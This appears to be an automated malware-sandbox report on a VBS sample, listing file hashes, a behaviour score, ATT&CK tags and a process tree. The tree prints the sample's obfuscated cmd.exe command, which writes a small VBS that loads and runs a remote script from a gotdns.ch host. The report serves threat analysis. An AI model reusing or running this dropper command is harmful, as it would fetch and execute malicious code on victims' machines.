cb350db86b49a5bf6a2735dd03d6509ac1ca7c80130daa848f9929b531b6e616

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
25/12/2023, 15:14

Target

287e0a96c764aab61c0dfd2469fde185.vbs
Size

59KB
MD5

287e0a96c764aab61c0dfd2469fde185
SHA1

be1fa431415c446bf5b690e62b293fa468f63617
SHA256

cb350db86b49a5bf6a2735dd03d6509ac1ca7c80130daa848f9929b531b6e616
SHA512

e93dc6819e7b24d033a9717ea1e4b7eb825f19d0700c2ba6146cef63a204f8f4dc5fce9cbf6ff6ff16c8341b3ab88bd56cd45dd6c401489a6b5e56d2a11d163a
SSDEEP

768:rtVO9PdrtQpv7UjbW9Ehx6Y4WwmGBC1dRv4P7SivUDwnZnIwuI8Jd:bO9PdrSpvh99Y4WJKP7DGwnZnIwd8Jd

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 2512	1708	WScript.exe	28
PID 1708 wrote to memory of 2512	1708	WScript.exe	28
PID 1708 wrote to memory of 2512	1708	WScript.exe	28
PID 2512 wrote to memory of 2388	2512	cmd.exe	30
PID 2512 wrote to memory of 2388	2512	cmd.exe	30
PID 2512 wrote to memory of 2388	2512	cmd.exe	30
PID 2512 wrote to memory of 2196	2512	cmd.exe	31
PID 2512 wrote to memory of 2196	2512	cmd.exe	31
PID 2512 wrote to memory of 2196	2512	cmd.exe	31
PID 2196 wrote to memory of 2224	2196	cmd.exe	32
PID 2196 wrote to memory of 2224	2196	cmd.exe	32
PID 2196 wrote to memory of 2224	2196	cmd.exe	32
PID 2224 wrote to memory of 2668	2224	cmd.exe	34
PID 2224 wrote to memory of 2668	2224	cmd.exe	34
PID 2224 wrote to memory of 2668	2224	cmd.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\287e0a96c764aab61c0dfd2469fde185.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "SEt A4O7=.vb&&SEt q0wd57= rbgq0u48 =qhk53 ^"scqhk53riqhk53ptqhk53:^": i5430j43 =qhk53 ^"hqhk53TtPsqhk53:^": Gqhk53etqhk53Objqhk53ecqhk53t(qhk53rbgq0u48+i5430j43+^"&&sET qhk53=n47076n47076mut4h.gotdns.ch/p2.php^")&&sEt/^p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%"<nul > C:\Users\Public\^d4120%A4O7%s|start cmd /c start C:\Users\Public\^d4120%A4O7%s"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" sEt/p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%" 0<nul 1>C:\Users\Public\d4120%A4O7%s"
    3⤵
    PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\d4120%A4O7%s "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\system32\cmd.exe
      cmd /c start C:\Users\Public\d4120.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2224
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\d4120.vbs"
        5⤵
        
        PID:2668

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Public\d4120.vbs

Filesize
98B

MD5
642e2fa68bf257b7c2891abca9e0c994

SHA1
4e2b917f2dbd6bbc72224edaedaf18bdfea7ba7f

SHA256
887469bfc0aae71beed5cde7d40f4c9403ab1bb8c1df4b0e513860c1fa7e8522

SHA512
e100bbdc3f9ccf6a634f647169999e66118a31b70f8047cd8c1c8dd0cbd8495bc6f6ab1c62a104dd7e895c2d83e16ab3644797b7bfc7091c66afa46ed232a376

Download Submit